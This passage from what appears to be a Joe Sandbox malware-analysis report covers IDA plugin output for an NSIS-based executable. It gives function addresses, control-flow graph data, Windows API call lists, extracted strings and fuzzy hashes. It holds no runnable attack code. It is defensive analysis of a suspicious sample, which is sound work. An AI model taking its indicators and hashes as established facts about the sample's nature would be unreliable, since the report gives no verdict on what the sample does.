                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID:
                                                        • API String ID: 3282139019-0
                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                        APIs
                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 608394941-2746725676
                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                        • lstrcatW.KERNEL32(00000000,00000000,SyndicateMapHappensAttractionSexually,004D70B0,00000000,00000000), ref: 00401A76
                                                        • CompareFileTime.KERNEL32(-00000014,?,SyndicateMapHappensAttractionSexually,SyndicateMapHappensAttractionSexually,00000000,00000000,SyndicateMapHappensAttractionSexually,004D70B0,00000000,00000000), ref: 00401AA0
                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,762323A0,00000000), ref: 00404FD6
                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FE6
                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FF9
                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SyndicateMapHappensAttractionSexually
                                                        • API String ID: 4286501637-1424157630
                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                        Strings
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                        • Inst, xrefs: 00403698
                                                        • Null, xrefs: 004036AA
                                                        • Error launching installer, xrefs: 00403603
                                                        • soft, xrefs: 004036A1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 4283519449-527102705
                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                        • wsprintfW.USER32 ref: 004034CE
                                                        • WriteFile.KERNELBASE(00000000,00000000,00425979,00403792,00000000), ref: 004034FF
                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: CountFileTickWrite$wsprintf
                                                        • String ID: (]C$... %d%%$pAB$yYB
                                                        • API String ID: 651206458-4203522772
                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                        APIs
                                                        • lstrlenW.KERNEL32(00445D80,00425979,762323A0,00000000), ref: 00404FD6
                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FE6
                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,762323A0,00000000), ref: 00404FF9
                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,762323A0,00000000), ref: 00406902
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2740478559-0
                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                        Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                        APIs
                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                        • GlobalFree.KERNELBASE(006FEE60), ref: 00402387
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
                                                        • API ID: FreeGloballstrcpyn
                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$SyndicateMapHappensAttractionSexually$`o
                                                        • API String ID: 1459762280-3270097527
                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                        • GlobalFree.KERNELBASE(006FEE60), ref: 00402387
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2275934321.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.2275781472.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.000000000049F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276341420.00000000004C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000004.00000002.2276575811.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_downloaded_exe.jbxd
                                                        Similarity
